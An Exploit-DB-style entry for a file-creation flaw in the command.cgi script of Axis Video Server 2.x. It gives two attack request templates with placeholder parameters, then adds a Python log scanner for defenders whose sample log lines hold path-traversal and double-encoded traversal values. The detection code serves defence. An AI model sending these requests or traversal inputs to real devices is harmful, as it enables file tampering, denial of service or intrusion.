Exploit Axis Communications Video Server 2.x - 'Command.cgi' File Creation

Exploiter

18 Dec 2022
EDB-ID: 22311
EDB verification: Passed
Author: MARTIN EISZNER
Vulnerability type: REMOTE
Platform: CGI
CVE: N/A
Publication date: 2003-02-28

Code:
source: https://www.securityfocus.com/bid/6987/info

It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution. 

http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]

http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]
 
Source: www.exploit-db.com
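
For defenders reviewing web or proxy logs for this issue, the following is an added detection example; it is not part of the original post or the Exploit-DB entry. It flags requests to the 'command.cgi' path whose `buffername` or `format` values are not plain tokens. The combined log format, the allowlist of legitimate values, the sample log lines and the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and parameter names are from the advisory; the rest is assumed.
ENDPOINT = "/axis-cgi/buffer/command.cgi"
WATCHED = ("buffername", "format")
# Assumption: legitimate values are short plain tokens (e.g. "X"); tune per site.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines in combined log format, not real traffic
    '192.0.2.10 - - [01/Mar/2003:10:00:00 +0000] "GET /axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=jpg HTTP/1.0" 200 12',
    '192.0.2.66 - - [01/Mar/2003:10:00:05 +0000] "GET /axis-cgi/buffer/command.cgi?do=start&buffername=../../tmp&format=..%2Fnote.txt HTTP/1.0" 200 12',
    '192.0.2.66 - - [01/Mar/2003:10:00:09 +0000] "GET /axis-cgi/buffer/command.cgi?do=start&buffername=X&format=%252e%252e%252fa HTTP/1.0" 200 12',
    '192.0.2.10 - - [01/Mar/2003:10:00:12 +0000] "GET /jpg/quad.jpg HTTP/1.0" 200 9000',
]


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return {param: decoded value} for watched parameters failing the allowlist."""
    match = REQUEST.search(log_line)
    if not match:
        return {}
    url = urlsplit(match.group(1))
    path = posixpath.normpath(fully_decode(url.path)).lower()
    if path != ENDPOINT:
        return {}
    hits = {}
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already decoded one layer
        if name.lower() in WATCHED and not SAFE_VALUE.fullmatch(value):
            hits[name.lower()] = value
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```

An allowlist on the two parameters catches both the malformed `format` case and the relative-path case without enumerating traversal patterns.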
